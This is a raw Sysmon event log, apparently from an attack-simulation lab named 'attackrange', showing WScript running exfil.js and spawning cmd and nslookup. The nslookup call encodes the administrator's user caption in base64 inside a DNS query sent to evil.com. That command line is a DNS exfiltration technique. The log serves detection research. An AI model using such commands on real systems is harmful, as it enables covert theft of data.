14:21:41.253{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljly.tmpMD5=9C101754059B3D04F26CF3E2F51B88AA,SHA256=CC24D14F511AA03DA88D98786AE6BD9247656E6D05B1882F17E6E6D57E27DA80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.237{2E1864BB-18F5-629A-F344-000000005F02}80962316C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-F444-000000005F02}1368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.237{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.237{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.237{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.237{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.237{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-F444-000000005F02}1368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.237{2E1864BB-18F5-629A-F244-000000005F02}9686440C:\Windows\system32\cmd.exe{2E1864BB-18F5-629A-F444-000000005F02}1368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.240{2E1864BB-18F5-629A-F444-000000005F02}1368C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F5-629A-F244-000000005F02}968C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljly.tmp 2>&1 10341000x8000000000000000212182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.222{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-F344-000000005F02}8096C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.222{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-F344-000000005F02}8096C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.206{2E1864BB-18F5-629A-F344-000000005F02}80962316C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-F244-000000005F02}968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.191{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-F344-000000005F02}8096C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.191{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.191{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.191{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.191{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.191{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-F244-000000005F02}968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.191{2E1864BB-18E0-629A-6742-000000005F02}3976172C:\Windows\System32\WScript.exe{2E1864BB-18F5-629A-F244-000000005F02}968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.200{2E1864BB-18F5-629A-F244-000000005F02}968C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljly.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.191{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltazudau.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000212170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.704{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50975- 354300x8000000000000000212169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.703{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50974- 354300x8000000000000000212168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.703{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50973- 354300x8000000000000000212167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.594{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50972- 354300x8000000000000000212166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.593{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50971- 354300x8000000000000000212165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.593{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50970- 354300x8000000000000000212164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.495{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50969- 354300x8000000000000000212163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.495{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50968- 354300x8000000000000000212162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.494{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50967- 354300x8000000000000000212161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.890{00000000-0000-0000-0000-000000000000}6232<unknown process>-udptruefalse127.0.0.1-50951-false127.0.0.1-53domain 354300x8000000000000000212160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.889{00000000-0000-0000-0000-000000000000}6232<unknown process>-udptruefalse127.0.0.1-50950-false127.0.0.1-53domain 354300x8000000000000000212159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.790{00000000-0000-0000-0000-000000000000}6160<unknown process>-udpfalsefalse127.0.0.1-50948-false127.0.0.1-53domain 354300x8000000000000000212158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.485{00000000-0000-0000-0000-000000000000}6652<unknown process>-udpfalsefalse127.0.0.1-50943-false127.0.0.1-53domain 354300x8000000000000000212157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.407{00000000-0000-0000-0000-000000000000}3300<unknown process>-udptruefalse127.0.0.1-50942-false127.0.0.1-53domain 354300x8000000000000000212156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.257{00000000-0000-0000-0000-000000000000}2932<unknown process>-udpfalsefalse127.0.0.1-50938-false127.0.0.1-53domain 354300x8000000000000000212155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.257{00000000-0000-0000-0000-000000000000}2932<unknown process>-udpfalsefalse127.0.0.1-50937-false127.0.0.1-53domain 354300x8000000000000000212154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.060{00000000-0000-0000-0000-000000000000}6372<unknown process>-udpfalsefalse127.0.0.1-50933-false127.0.0.1-53domain 354300x8000000000000000212153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.935{00000000-0000-0000-0000-000000000000}5836<unknown process>-udpfalsefalse127.0.0.1-50929-false127.0.0.1-53domain 10341000x8000000000000000212152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.167{2E1864BB-18F5-629A-F044-000000005F02}51006416C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-F144-000000005F02}488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.167{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.167{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.167{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.167{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYST